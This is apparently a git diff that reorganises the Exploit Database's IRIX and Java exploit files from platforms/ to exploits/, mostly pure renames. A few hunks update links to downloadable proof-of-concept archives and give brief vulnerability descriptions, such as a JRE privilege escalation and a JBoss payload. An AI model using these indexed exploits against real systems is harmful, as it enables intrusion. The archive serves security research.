exploits/irix/local/19706.sh diff --git a/platforms/irix/local/20126.c b/exploits/irix/local/20126.c similarity index 100% rename from platforms/irix/local/20126.c rename to exploits/irix/local/20126.c diff --git a/platforms/irix/local/20127.c b/exploits/irix/local/20127.c similarity index 100% rename from platforms/irix/local/20127.c rename to exploits/irix/local/20127.c diff --git a/platforms/irix/local/20128.c b/exploits/irix/local/20128.c similarity index 100% rename from platforms/irix/local/20128.c rename to exploits/irix/local/20128.c diff --git a/platforms/irix/local/20129.c b/exploits/irix/local/20129.c similarity index 100% rename from platforms/irix/local/20129.c rename to exploits/irix/local/20129.c diff --git a/platforms/irix/local/20130.c b/exploits/irix/local/20130.c similarity index 100% rename from platforms/irix/local/20130.c rename to exploits/irix/local/20130.c diff --git a/platforms/irix/local/20137.c b/exploits/irix/local/20137.c similarity index 100% rename from platforms/irix/local/20137.c rename to exploits/irix/local/20137.c diff --git a/platforms/irix/local/20138.c b/exploits/irix/local/20138.c similarity index 100% rename from platforms/irix/local/20138.c rename to exploits/irix/local/20138.c diff --git a/platforms/irix/local/20263.txt b/exploits/irix/local/20263.txt similarity index 100% rename from platforms/irix/local/20263.txt rename to exploits/irix/local/20263.txt diff --git a/platforms/irix/local/20804.c b/exploits/irix/local/20804.c similarity index 100% rename from platforms/irix/local/20804.c rename to exploits/irix/local/20804.c diff --git a/platforms/irix/local/20937.c b/exploits/irix/local/20937.c similarity index 100% rename from platforms/irix/local/20937.c rename to exploits/irix/local/20937.c diff --git a/platforms/irix/local/21720.txt b/exploits/irix/local/21720.txt similarity index 100% rename from platforms/irix/local/21720.txt rename to exploits/irix/local/21720.txt diff --git a/platforms/irix/local/25361.txt b/exploits/irix/local/25361.txt similarity index 100% rename from platforms/irix/local/25361.txt rename to exploits/irix/local/25361.txt diff --git a/platforms/irix/local/25362.txt b/exploits/irix/local/25362.txt similarity index 100% rename from platforms/irix/local/25362.txt rename to exploits/irix/local/25362.txt diff --git a/platforms/irix/local/265.sh b/exploits/irix/local/265.sh similarity index 100% rename from platforms/irix/local/265.sh rename to exploits/irix/local/265.sh diff --git a/platforms/irix/local/270.sh b/exploits/irix/local/270.sh similarity index 100% rename from platforms/irix/local/270.sh rename to exploits/irix/local/270.sh diff --git a/platforms/irix/local/334.c b/exploits/irix/local/334.c similarity index 100% rename from platforms/irix/local/334.c rename to exploits/irix/local/334.c diff --git a/platforms/irix/local/336.c b/exploits/irix/local/336.c similarity index 100% rename from platforms/irix/local/336.c rename to exploits/irix/local/336.c diff --git a/platforms/irix/local/337.c b/exploits/irix/local/337.c similarity index 100% rename from platforms/irix/local/337.c rename to exploits/irix/local/337.c diff --git a/platforms/irix/remote/10033.rb b/exploits/irix/remote/10033.rb similarity index 100% rename from platforms/irix/remote/10033.rb rename to exploits/irix/remote/10033.rb diff --git a/platforms/irix/remote/19316.c b/exploits/irix/remote/19316.c similarity index 100% rename from platforms/irix/remote/19316.c rename to exploits/irix/remote/19316.c diff --git a/platforms/irix/remote/19788.pl b/exploits/irix/remote/19788.pl similarity index 100% rename from platforms/irix/remote/19788.pl rename to exploits/irix/remote/19788.pl diff --git a/platforms/irix/remote/19822.c b/exploits/irix/remote/19822.c similarity index 100% rename from platforms/irix/remote/19822.c rename to exploits/irix/remote/19822.c diff --git a/platforms/irix/remote/19949.c b/exploits/irix/remote/19949.c similarity index 100% rename from platforms/irix/remote/19949.c rename to exploits/irix/remote/19949.c diff --git a/platforms/irix/remote/20149.c b/exploits/irix/remote/20149.c similarity index 100% rename from platforms/irix/remote/20149.c rename to exploits/irix/remote/20149.c diff --git a/platforms/irix/remote/20805.c b/exploits/irix/remote/20805.c similarity index 100% rename from platforms/irix/remote/20805.c rename to exploits/irix/remote/20805.c diff --git a/platforms/irix/remote/21571.c b/exploits/irix/remote/21571.c similarity index 100% rename from platforms/irix/remote/21571.c rename to exploits/irix/remote/21571.c diff --git a/platforms/java/dos/27882.java b/exploits/java/dos/27882.java similarity index 100% rename from platforms/java/dos/27882.java rename to exploits/java/dos/27882.java diff --git a/platforms/java/dos/32860.txt b/exploits/java/dos/32860.txt similarity index 100% rename from platforms/java/dos/32860.txt rename to exploits/java/dos/32860.txt diff --git a/platforms/java/dos/41965.txt b/exploits/java/dos/41965.txt similarity index 95% rename from platforms/java/dos/41965.txt rename to exploits/java/dos/41965.txt index eca382cc1..d9b23594e 100644 --- a/platforms/java/dos/41965.txt +++ b/exploits/java/dos/41965.txt @@ -21,4 +21,4 @@ The second step is to change python script jenkins_poc1.py: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41965.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41965.zip \ No newline at end of file diff --git a/platforms/java/remote/19717.rb b/exploits/java/remote/19717.rb similarity index 100% rename from platforms/java/remote/19717.rb rename to exploits/java/remote/19717.rb diff --git a/platforms/java/remote/20502.rb b/exploits/java/remote/20502.rb similarity index 100% rename from platforms/java/remote/20502.rb rename to exploits/java/remote/20502.rb diff --git a/platforms/java/remote/20865.rb b/exploits/java/remote/20865.rb similarity index 100% rename from platforms/java/remote/20865.rb rename to exploits/java/remote/20865.rb diff --git a/platforms/java/remote/21846.rb b/exploits/java/remote/21846.rb similarity index 100% rename from platforms/java/remote/21846.rb rename to exploits/java/remote/21846.rb diff --git a/platforms/java/remote/24045.rb b/exploits/java/remote/24045.rb similarity index 100% rename from platforms/java/remote/24045.rb rename to exploits/java/remote/24045.rb diff --git a/platforms/java/remote/24309.rb b/exploits/java/remote/24309.rb similarity index 100% rename from platforms/java/remote/24309.rb rename to exploits/java/remote/24309.rb diff --git a/platforms/java/remote/28887.txt b/exploits/java/remote/28887.txt similarity index 100% rename from platforms/java/remote/28887.txt rename to exploits/java/remote/28887.txt diff --git a/platforms/java/remote/29859.rb b/exploits/java/remote/29859.rb similarity index 100% rename from platforms/java/remote/29859.rb rename to exploits/java/remote/29859.rb diff --git a/platforms/java/remote/30008.rb b/exploits/java/remote/30008.rb similarity index 100% rename from platforms/java/remote/30008.rb rename to exploits/java/remote/30008.rb diff --git a/platforms/java/remote/30502.txt b/exploits/java/remote/30502.txt similarity index 91% rename from platforms/java/remote/30502.txt rename to exploits/java/remote/30502.txt index c792e1f84..5427b93e9 100644 --- a/platforms/java/remote/30502.txt +++ b/exploits/java/remote/30502.txt @@ -4,4 +4,4 @@ The Sun Java Runtime Environment is prone to a remote privilege-escalation vulne An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30502.tti \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30502.tti \ No newline at end of file diff --git a/platforms/java/remote/31434.rb b/exploits/java/remote/31434.rb similarity index 100% rename from platforms/java/remote/31434.rb rename to exploits/java/remote/31434.rb diff --git a/platforms/java/remote/33588.rb b/exploits/java/remote/33588.rb similarity index 100% rename from platforms/java/remote/33588.rb rename to exploits/java/remote/33588.rb diff --git a/platforms/java/remote/33891.rb b/exploits/java/remote/33891.rb similarity index 100% rename from platforms/java/remote/33891.rb rename to exploits/java/remote/33891.rb diff --git a/platforms/java/remote/34671.rb b/exploits/java/remote/34671.rb similarity index 100% rename from platforms/java/remote/34671.rb rename to exploits/java/remote/34671.rb diff --git a/platforms/java/remote/34867.rb b/exploits/java/remote/34867.rb similarity index 100% rename from platforms/java/remote/34867.rb rename to exploits/java/remote/34867.rb diff --git a/platforms/java/remote/35211.rb b/exploits/java/remote/35211.rb similarity index 100% rename from platforms/java/remote/35211.rb rename to exploits/java/remote/35211.rb diff --git a/platforms/java/remote/35776.rb b/exploits/java/remote/35776.rb similarity index 100% rename from platforms/java/remote/35776.rb rename to exploits/java/remote/35776.rb diff --git a/platforms/java/remote/35845.rb b/exploits/java/remote/35845.rb similarity index 100% rename from platforms/java/remote/35845.rb rename to exploits/java/remote/35845.rb diff --git a/platforms/java/remote/36101.rb b/exploits/java/remote/36101.rb similarity index 100% rename from platforms/java/remote/36101.rb rename to exploits/java/remote/36101.rb diff --git a/platforms/java/remote/36415.rb b/exploits/java/remote/36415.rb similarity index 100% rename from platforms/java/remote/36415.rb rename to exploits/java/remote/36415.rb diff --git a/platforms/java/remote/36964.rb b/exploits/java/remote/36964.rb similarity index 100% rename from platforms/java/remote/36964.rb rename to exploits/java/remote/36964.rb diff --git a/platforms/java/remote/37667.rb b/exploits/java/remote/37667.rb similarity index 100% rename from platforms/java/remote/37667.rb rename to exploits/java/remote/37667.rb diff --git a/platforms/java/remote/38221.rb b/exploits/java/remote/38221.rb similarity index 100% rename from platforms/java/remote/38221.rb rename to exploits/java/remote/38221.rb diff --git a/platforms/java/remote/38983.rb b/exploits/java/remote/38983.rb similarity index 100% rename from platforms/java/remote/38983.rb rename to exploits/java/remote/38983.rb diff --git a/platforms/java/remote/39007.txt b/exploits/java/remote/39007.txt similarity index 96% rename from platforms/java/remote/39007.txt rename to exploits/java/remote/39007.txt index 101a216e9..3b892f966 100644 --- a/platforms/java/remote/39007.txt +++ b/exploits/java/remote/39007.txt @@ -66,4 +66,4 @@ The Jasmin file we used is attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39007.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39007.zip \ No newline at end of file diff --git a/platforms/java/remote/39643.rb b/exploits/java/remote/39643.rb similarity index 100% rename from platforms/java/remote/39643.rb rename to exploits/java/remote/39643.rb diff --git a/platforms/java/remote/39852.rb b/exploits/java/remote/39852.rb similarity index 100% rename from platforms/java/remote/39852.rb rename to exploits/java/remote/39852.rb diff --git a/platforms/java/remote/39854.txt b/exploits/java/remote/39854.txt similarity index 96% rename from platforms/java/remote/39854.txt rename to exploits/java/remote/39854.txt index de5629813..ff392fa90 100644 --- a/platforms/java/remote/39854.txt +++ b/exploits/java/remote/39854.txt @@ -55,7 +55,7 @@ Proof of concept: A simple PoC can be found here: https://github.com/h0ng10/powerfolder-exploit-poc -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39854.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39854.zip Disclosure timeline: ---------------------------------------------------------------------- diff --git a/platforms/java/remote/41366.java b/exploits/java/remote/41366.java similarity index 100% rename from platforms/java/remote/41366.java rename to exploits/java/remote/41366.java diff --git a/platforms/java/remote/42283.rb b/exploits/java/remote/42283.rb similarity index 100% rename from platforms/java/remote/42283.rb rename to exploits/java/remote/42283.rb diff --git a/platforms/java/remote/42394.py b/exploits/java/remote/42394.py similarity index 100% rename from platforms/java/remote/42394.py rename to exploits/java/remote/42394.py diff --git a/platforms/java/remote/42701.rb b/exploits/java/remote/42701.rb similarity index 100% rename from platforms/java/remote/42701.rb rename to exploits/java/remote/42701.rb diff --git a/platforms/java/remote/42702.rb b/exploits/java/remote/42702.rb similarity index 100% rename from platforms/java/remote/42702.rb rename to exploits/java/remote/42702.rb diff --git a/platforms/java/remote/42756.py b/exploits/java/remote/42756.py similarity index 100% rename from platforms/java/remote/42756.py rename to exploits/java/remote/42756.py diff --git a/platforms/java/remote/42806.py b/exploits/java/remote/42806.py similarity index 100% rename from platforms/java/remote/42806.py rename to exploits/java/remote/42806.py diff --git a/platforms/java/remote/43008.rb b/exploits/java/remote/43008.rb similarity index 100% rename from platforms/java/remote/43008.rb rename to exploits/java/remote/43008.rb diff --git a/platforms/java/webapps/18881.txt b/exploits/java/webapps/18881.txt similarity index 100% rename from platforms/java/webapps/18881.txt rename to exploits/java/webapps/18881.txt diff --git a/platforms/java/webapps/20668.py b/exploits/java/webapps/20668.py similarity index 100% rename from platforms/java/webapps/20668.py rename to exploits/java/webapps/20668.py diff --git a/platforms/java/webapps/20925.txt b/exploits/java/webapps/20925.txt similarity index 100% rename from platforms/java/webapps/20925.txt rename to exploits/java/webapps/20925.txt diff --git a/platforms/java/webapps/21543.txt b/exploits/java/webapps/21543.txt similarity index 100% rename from platforms/java/webapps/21543.txt rename to exploits/java/webapps/21543.txt diff --git a/platforms/java/webapps/21562.txt b/exploits/java/webapps/21562.txt similarity index 100% rename from platforms/java/webapps/21562.txt rename to exploits/java/webapps/21562.txt diff --git a/platforms/java/webapps/21879.txt b/exploits/java/webapps/21879.txt similarity index 100% rename from platforms/java/webapps/21879.txt rename to exploits/java/webapps/21879.txt diff --git a/platforms/java/webapps/21946.txt b/exploits/java/webapps/21946.txt similarity index 100% rename from platforms/java/webapps/21946.txt rename to exploits/java/webapps/21946.txt diff --git a/platforms/java/webapps/22752.txt b/exploits/java/webapps/22752.txt similarity index 100% rename from platforms/java/webapps/22752.txt rename to exploits/java/webapps/22752.txt diff --git a/platforms/java/webapps/23268.txt b/exploits/java/webapps/23268.txt similarity index 100% rename from platforms/java/webapps/23268.txt rename to exploits/java/webapps/23268.txt diff --git a/platforms/java/webapps/24190.txt b/exploits/java/webapps/24190.txt similarity index 100% rename from platforms/java/webapps/24190.txt rename to exploits/java/webapps/24190.txt diff --git a/platforms/java/webapps/24791.txt b/exploits/java/webapps/24791.txt similarity index 100% rename from platforms/java/webapps/24791.txt rename to exploits/java/webapps/24791.txt diff --git a/platforms/java/webapps/25702.txt b/exploits/java/webapps/25702.txt similarity index 100% rename from platforms/java/webapps/25702.txt rename to exploits/java/webapps/25702.txt diff --git a/platforms/java/webapps/26001.txt b/exploits/java/webapps/26001.txt similarity index 100% rename from platforms/java/webapps/26001.txt rename to exploits/java/webapps/26001.txt diff --git a/platforms/java/webapps/26987.txt b/exploits/java/webapps/26987.txt similarity index 100% rename from platforms/java/webapps/26987.txt rename to exploits/java/webapps/26987.txt diff --git a/platforms/java/webapps/27888.txt b/exploits/java/webapps/27888.txt similarity index 100% rename from platforms/java/webapps/27888.txt rename to exploits/java/webapps/27888.txt diff --git a/platforms/java/webapps/28116.txt b/exploits/java/webapps/28116.txt similarity index 100% rename from platforms/java/webapps/28116.txt rename to exploits/java/webapps/28116.txt diff --git a/platforms/java/webapps/29918.txt b/exploits/java/webapps/29918.txt similarity index 100% rename from platforms/java/webapps/29918.txt rename to exploits/java/webapps/29918.txt diff --git a/platforms/java/webapps/30271.txt b/exploits/java/webapps/30271.txt similarity index 100% rename from platforms/java/webapps/30271.txt rename to exploits/java/webapps/30271.txt diff --git a/platforms/java/webapps/30272.txt b/exploits/java/webapps/30272.txt similarity index 100% rename from platforms/java/webapps/30272.txt rename to exploits/java/webapps/30272.txt diff --git a/platforms/java/webapps/30273.txt b/exploits/java/webapps/30273.txt similarity index 100% rename from platforms/java/webapps/30273.txt rename to exploits/java/webapps/30273.txt diff --git a/platforms/java/webapps/30274.txt b/exploits/java/webapps/30274.txt similarity index 100% rename from platforms/java/webapps/30274.txt rename to exploits/java/webapps/30274.txt diff --git a/platforms/java/webapps/30275.txt b/exploits/java/webapps/30275.txt similarity index 100% rename from platforms/java/webapps/30275.txt rename to exploits/java/webapps/30275.txt diff --git a/platforms/java/webapps/30514.txt b/exploits/java/webapps/30514.txt similarity index 100% rename from platforms/java/webapps/30514.txt rename to exploits/java/webapps/30514.txt diff --git a/platforms/java/webapps/30674.txt b/exploits/java/webapps/30674.txt similarity index 100% rename from platforms/java/webapps/30674.txt rename to exploits/java/webapps/30674.txt diff --git a/platforms/java/webapps/31073.html b/exploits/java/webapps/31073.html similarity index 100% rename from platforms/java/webapps/31073.html rename to exploits/java/webapps/31073.html diff --git a/platforms/java/webapps/31189.txt b/exploits/java/webapps/31189.txt similarity index 100% rename from platforms/java/webapps/31189.txt rename to exploits/java/webapps/31189.txt diff --git a/platforms/java/webapps/31438.txt b/exploits/java/webapps/31438.txt similarity index 100% rename from platforms/java/webapps/31438.txt rename to exploits/java/webapps/31438.txt diff --git a/platforms/java/webapps/31621.txt b/exploits/java/webapps/31621.txt similarity index 100% rename from platforms/java/webapps/31621.txt rename to exploits/java/webapps/31621.txt diff --git a/platforms/java/webapps/31641.txt b/exploits/java/webapps/31641.txt similarity index 100% rename from platforms/java/webapps/31641.txt rename to exploits/java/webapps/31641.txt diff --git a/platforms/java/webapps/31816.txt b/exploits/java/webapps/31816.txt similarity index 100% rename from platforms/java/webapps/31816.txt rename to exploits/java/webapps/31816.txt diff --git a/platforms/java/webapps/32448.txt b/exploits/java/webapps/32448.txt similarity index 100% rename from platforms/java/webapps/32448.txt rename to exploits/java/webapps/32448.txt diff --git a/platforms/java/webapps/32459.txt b/exploits/java/webapps/32459.txt similarity index 100% rename from platforms/java/webapps/32459.txt rename to exploits/java/webapps/32459.txt diff --git a/platforms/java/webapps/32574.txt b/exploits/java/webapps/32574.txt similarity index 100% rename from platforms/java/webapps/32574.txt rename to exploits/java/webapps/32574.txt diff --git a/platforms/java/webapps/32818.txt b/exploits/java/webapps/32818.txt similarity index 100% rename from platforms/java/webapps/32818.txt rename to exploits/java/webapps/32818.txt diff --git a/platforms/java/webapps/32821.html b/exploits/java/webapps/32821.html similarity index 100% rename from platforms/java/webapps/32821.html rename to exploits/java/webapps/32821.html diff --git a/platforms/java/webapps/32858.txt b/exploits/java/webapps/32858.txt similarity index 100% rename from platforms/java/webapps/32858.txt rename to exploits/java/webapps/32858.txt diff --git a/platforms/java/webapps/32862.txt b/exploits/java/webapps/32862.txt similarity index 100% rename from platforms/java/webapps/32862.txt rename to exploits/java/webapps/32862.txt diff --git a/platforms/java/webapps/32863.txt b/exploits/java/webapps/32863.txt similarity index 100% rename from platforms/java/webapps/32863.txt rename to exploits/java/webapps/32863.txt diff --git a/platforms/java/webapps/32864.txt b/exploits/java/webapps/32864.txt similarity index 100% rename from platforms/java/webapps/32864.txt rename to exploits/java/webapps/32864.txt diff --git a/platforms/java/webapps/32897.txt b/exploits/java/webapps/32897.txt similarity index 100% rename from platforms/java/webapps/32897.txt rename to exploits/java/webapps/32897.txt diff --git a/platforms/java/webapps/32909.txt b/exploits/java/webapps/32909.txt similarity index 100% rename from platforms/java/webapps/32909.txt rename to exploits/java/webapps/32909.txt diff --git a/platforms/java/webapps/32927.txt b/exploits/java/webapps/32927.txt similarity index 100% rename from platforms/java/webapps/32927.txt rename to exploits/java/webapps/32927.txt diff --git a/platforms/java/webapps/32940.txt b/exploits/java/webapps/32940.txt similarity index 100% rename from platforms/java/webapps/32940.txt rename to exploits/java/webapps/32940.txt diff --git a/platforms/java/webapps/33048.txt b/exploits/java/webapps/33048.txt similarity index 100% rename from platforms/java/webapps/33048.txt rename to exploits/java/webapps/33048.txt diff --git a/platforms/java/webapps/33181.txt b/exploits/java/webapps/33181.txt similarity index 100% rename from platforms/java/webapps/33181.txt rename to exploits/java/webapps/33181.txt diff --git a/platforms/java/webapps/33254.txt b/exploits/java/webapps/33254.txt similarity index 100% rename from platforms/java/webapps/33254.txt rename to exploits/java/webapps/33254.txt diff --git a/platforms/java/webapps/33286.txt b/exploits/java/webapps/33286.txt similarity index 100% rename from platforms/java/webapps/33286.txt rename to exploits/java/webapps/33286.txt diff --git a/platforms/java/webapps/33687.txt b/exploits/java/webapps/33687.txt similarity index 100% rename from platforms/java/webapps/33687.txt rename to exploits/java/webapps/33687.txt diff --git a/platforms/java/webapps/33939.txt b/exploits/java/webapps/33939.txt similarity index 100% rename from platforms/java/webapps/33939.txt rename to exploits/java/webapps/33939.txt diff --git a/platforms/java/webapps/34108.txt b/exploits/java/webapps/34108.txt similarity index 100% rename from platforms/java/webapps/34108.txt rename to exploits/java/webapps/34108.txt diff --git a/platforms/java/webapps/34290.txt b/exploits/java/webapps/34290.txt similarity index 100% rename from platforms/java/webapps/34290.txt rename to exploits/java/webapps/34290.txt diff --git a/platforms/java/webapps/34293.txt b/exploits/java/webapps/34293.txt similarity index 100% rename from platforms/java/webapps/34293.txt rename to exploits/java/webapps/34293.txt diff --git a/platforms/java/webapps/34345.txt b/exploits/java/webapps/34345.txt similarity index 100% rename from platforms/java/webapps/34345.txt rename to exploits/java/webapps/34345.txt diff --git a/platforms/java/webapps/35683.txt b/exploits/java/webapps/35683.txt similarity index 100% rename from platforms/java/webapps/35683.txt rename to exploits/java/webapps/35683.txt diff --git a/platforms/java/webapps/35781.txt b/exploits/java/webapps/35781.txt similarity index 100% rename from platforms/java/webapps/35781.txt rename to exploits/java/webapps/35781.txt diff --git a/platforms/java/webapps/36292.txt b/exploits/java/webapps/36292.txt similarity index 100% rename from platforms/java/webapps/36292.txt rename to exploits/java/webapps/36292.txt diff --git a/platforms/java/webapps/36299.txt b/exploits/java/webapps/36299.txt similarity index 100% rename from platforms/java/webapps/36299.txt rename to exploits/java/webapps/36299.txt diff --git a/platforms/java/webapps/36423.txt b/exploits/java/webapps/36423.txt similarity index 100% rename from platforms/java/webapps/36423.txt rename to exploits/java/webapps/36423.txt diff --git a/platforms/java/webapps/36436.txt b/exploits/java/webapps/36436.txt similarity index 100% rename from platforms/java/webapps/36436.txt rename to exploits/java/webapps/36436.txt diff --git a/platforms/java/webapps/36440.txt b/exploits/java/webapps/36440.txt similarity index 100% rename from platforms/java/webapps/36440.txt rename to exploits/java/webapps/36440.txt diff --git a/platforms/java/webapps/36548.txt b/exploits/java/webapps/36548.txt similarity index 100% rename from platforms/java/webapps/36548.txt rename to exploits/java/webapps/36548.txt diff --git a/platforms/java/webapps/36553.java b/exploits/java/webapps/36553.java similarity index 100% rename from platforms/java/webapps/36553.java rename to exploits/java/webapps/36553.java diff --git a/platforms/java/webapps/36666.txt b/exploits/java/webapps/36666.txt similarity index 100% rename from platforms/java/webapps/36666.txt rename to exploits/java/webapps/36666.txt diff --git a/platforms/java/webapps/36667.txt b/exploits/java/webapps/36667.txt similarity index 100% rename from platforms/java/webapps/36667.txt rename to exploits/java/webapps/36667.txt diff --git a/platforms/java/webapps/36684.txt b/exploits/java/webapps/36684.txt similarity index 100% rename from platforms/java/webapps/36684.txt rename to exploits/java/webapps/36684.txt diff --git a/platforms/java/webapps/36828.txt b/exploits/java/webapps/36828.txt similarity index 100% rename from platforms/java/webapps/36828.txt rename to exploits/java/webapps/36828.txt diff --git a/platforms/java/webapps/36939.txt b/exploits/java/webapps/36939.txt similarity index 100% rename from platforms/java/webapps/36939.txt rename to exploits/java/webapps/36939.txt diff --git a/platforms/java/webapps/36971.txt b/exploits/java/webapps/36971.txt similarity index 100% rename from platforms/java/webapps/36971.txt rename to exploits/java/webapps/36971.txt diff --git a/platforms/java/webapps/37006.txt b/exploits/java/webapps/37006.txt similarity index 100% rename from platforms/java/webapps/37006.txt rename to exploits/java/webapps/37006.txt diff --git a/platforms/java/webapps/37009.xml b/exploits/java/webapps/37009.xml similarity index 100% rename from platforms/java/webapps/37009.xml rename to exploits/java/webapps/37009.xml diff --git a/platforms/java/webapps/37029.txt b/exploits/java/webapps/37029.txt similarity index 100% rename from platforms/java/webapps/37029.txt rename to exploits/java/webapps/37029.txt diff --git a/platforms/java/webapps/37030.txt b/exploits/java/webapps/37030.txt similarity index 100% rename from platforms/java/webapps/37030.txt rename to exploits/java/webapps/37030.txt diff --git a/platforms/java/webapps/37031.txt b/exploits/java/webapps/37031.txt similarity index 100% rename from platforms/java/webapps/37031.txt rename to exploits/java/webapps/37031.txt diff --git a/platforms/java/webapps/37032.txt b/exploits/java/webapps/37032.txt similarity index 100% rename from platforms/java/webapps/37032.txt rename to exploits/java/webapps/37032.txt diff --git a/platforms/java/webapps/37033.txt b/exploits/java/webapps/37033.txt similarity index 100% rename from platforms/java/webapps/37033.txt rename to exploits/java/webapps/37033.txt diff --git a/platforms/java/webapps/37110.py b/exploits/java/webapps/37110.py similarity index 100% rename from platforms/java/webapps/37110.py rename to exploits/java/webapps/37110.py diff --git a/platforms/java/webapps/37372.html b/exploits/java/webapps/37372.html similarity index 100% rename from platforms/java/webapps/37372.html rename to exploits/java/webapps/37372.html diff --git a/platforms/java/webapps/37416.txt b/exploits/java/webapps/37416.txt similarity index 100% rename from platforms/java/webapps/37416.txt rename to exploits/java/webapps/37416.txt diff --git a/platforms/java/webapps/37555.txt b/exploits/java/webapps/37555.txt similarity index 100% rename from platforms/java/webapps/37555.txt rename to exploits/java/webapps/37555.txt diff --git a/platforms/java/webapps/37557.txt b/exploits/java/webapps/37557.txt similarity index 100% rename from platforms/java/webapps/37557.txt rename to exploits/java/webapps/37557.txt diff --git a/platforms/java/webapps/37589.txt b/exploits/java/webapps/37589.txt similarity index 100% rename from platforms/java/webapps/37589.txt rename to exploits/java/webapps/37589.txt diff --git a/platforms/java/webapps/37999.txt b/exploits/java/webapps/37999.txt similarity index 100% rename from platforms/java/webapps/37999.txt rename to exploits/java/webapps/37999.txt diff --git a/platforms/java/webapps/38130.txt b/exploits/java/webapps/38130.txt similarity index 100% rename from platforms/java/webapps/38130.txt rename to exploits/java/webapps/38130.txt diff --git a/platforms/java/webapps/38358.txt b/exploits/java/webapps/38358.txt similarity index 100% rename from platforms/java/webapps/38358.txt rename to exploits/java/webapps/38358.txt diff --git a/platforms/java/webapps/38461.txt b/exploits/java/webapps/38461.txt similarity index 100% rename from platforms/java/webapps/38461.txt rename to exploits/java/webapps/38461.txt diff --git a/platforms/java/webapps/38462.txt b/exploits/java/webapps/38462.txt similarity index 100% rename from platforms/java/webapps/38462.txt rename to exploits/java/webapps/38462.txt diff --git a/platforms/java/webapps/38551.py b/exploits/java/webapps/38551.py similarity index 100% rename from platforms/java/webapps/38551.py rename to exploits/java/webapps/38551.py diff --git a/platforms/java/webapps/38664.py b/exploits/java/webapps/38664.py similarity index 100% rename from platforms/java/webapps/38664.py rename to exploits/java/webapps/38664.py diff --git a/platforms/java/webapps/38739.txt b/exploits/java/webapps/38739.txt similarity index 100% rename from platforms/java/webapps/38739.txt rename to exploits/java/webapps/38739.txt diff --git a/platforms/java/webapps/39193.txt b/exploits/java/webapps/39193.txt similarity index 100% rename from platforms/java/webapps/39193.txt rename to exploits/java/webapps/39193.txt diff --git a/platforms/java/webapps/39241.py b/exploits/java/webapps/39241.py similarity index 100% rename from platforms/java/webapps/39241.py rename to exploits/java/webapps/39241.py diff --git a/platforms/java/webapps/39334.txt b/exploits/java/webapps/39334.txt similarity index 100% rename from platforms/java/webapps/39334.txt rename to exploits/java/webapps/39334.txt diff --git a/platforms/java/webapps/39391.txt b/exploits/java/webapps/39391.txt similarity index 100% rename from platforms/java/webapps/39391.txt rename to exploits/java/webapps/39391.txt diff --git a/platforms/java/webapps/39418.txt b/exploits/java/webapps/39418.txt similarity index 100% rename from platforms/java/webapps/39418.txt rename to exploits/java/webapps/39418.txt diff --git a/platforms/java/webapps/39481.txt b/exploits/java/webapps/39481.txt similarity index 100% rename from platforms/java/webapps/39481.txt rename to exploits/java/webapps/39481.txt diff --git a/platforms/java/webapps/39715.rb b/exploits/java/webapps/39715.rb similarity index 100% rename from platforms/java/webapps/39715.rb rename to exploits/java/webapps/39715.rb diff --git a/platforms/java/webapps/39837.txt b/exploits/java/webapps/39837.txt similarity index 100% rename from platforms/java/webapps/39837.txt rename to exploits/java/webapps/39837.txt diff --git a/platforms/java/webapps/39886.txt b/exploits/java/webapps/39886.txt similarity index 100% rename from platforms/java/webapps/39886.txt rename to exploits/java/webapps/39886.txt diff --git a/platforms/java/webapps/39995.txt b/exploits/java/webapps/39995.txt similarity index 100% rename from platforms/java/webapps/39995.txt rename to exploits/java/webapps/39995.txt diff --git a/platforms/java/webapps/39996.txt b/exploits/java/webapps/39996.txt similarity index 100% rename from platforms/java/webapps/39996.txt rename to exploits/java/webapps/39996.txt diff --git a/platforms/java/webapps/40161.txt b/exploits/java/webapps/40161.txt similarity index 100% rename from platforms/java/webapps/40161.txt rename to exploits/java/webapps/40161.txt diff --git a/platforms/java/webapps/40231.txt b/exploits/java/webapps/40231.txt similarity index 100% rename from platforms/java/webapps/40231.txt rename to exploits/java/webapps/40231.txt diff --git a/platforms/java/webapps/40286.txt b/exploits/java/webapps/40286.txt similarity index 100% rename from platforms/java/webapps/40286.txt rename to exploits/java/webapps/40286.txt diff --git a/platforms/java/webapps/40437.txt b/exploits/java/webapps/40437.txt similarity index 100% rename from platforms/java/webapps/40437.txt rename to exploits/java/webapps/40437.txt diff --git a/platforms/java/webapps/40569.txt b/exploits/java/webapps/40569.txt similarity index 100% rename from platforms/java/webapps/40569.txt rename to exploits/java/webapps/40569.txt diff --git a/platforms/java/webapps/40794.txt b/exploits/java/webapps/40794.txt similarity index 100% rename from platforms/java/webapps/40794.txt rename to exploits/java/webapps/40794.txt diff --git a/platforms/java/webapps/40817.txt b/exploits/java/webapps/40817.txt similarity index 96% rename from platforms/java/webapps/40817.txt rename to exploits/java/webapps/40817.txt index b3ebc54c2..6ddaa712d 100644 --- a/platforms/java/webapps/40817.txt +++ b/exploits/java/webapps/40817.txt @@ -90,7 +90,7 @@ The vulnerability allows remote attackers to permanently embed arbitrary script 7. POC =========== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40817.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40817.zip 8. SOLUTION =========== diff --git a/platforms/java/webapps/40842.txt b/exploits/java/webapps/40842.txt similarity index 95% rename from platforms/java/webapps/40842.txt rename to exploits/java/webapps/40842.txt index 5c48d3339..a2fa728ed 100644 --- a/platforms/java/webapps/40842.txt +++ b/exploits/java/webapps/40842.txt @@ -62,7 +62,7 @@ support and JBoss EAP 5 is close to the end of its maintenance period. See jboss_payload.zip (40842.zip) and Example Attack Session above. http://lab.mediaservice.net/code/jboss_payload.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40842.zip 6. Timeline @@ -74,4 +74,4 @@ Copyright (c) 2016 @ 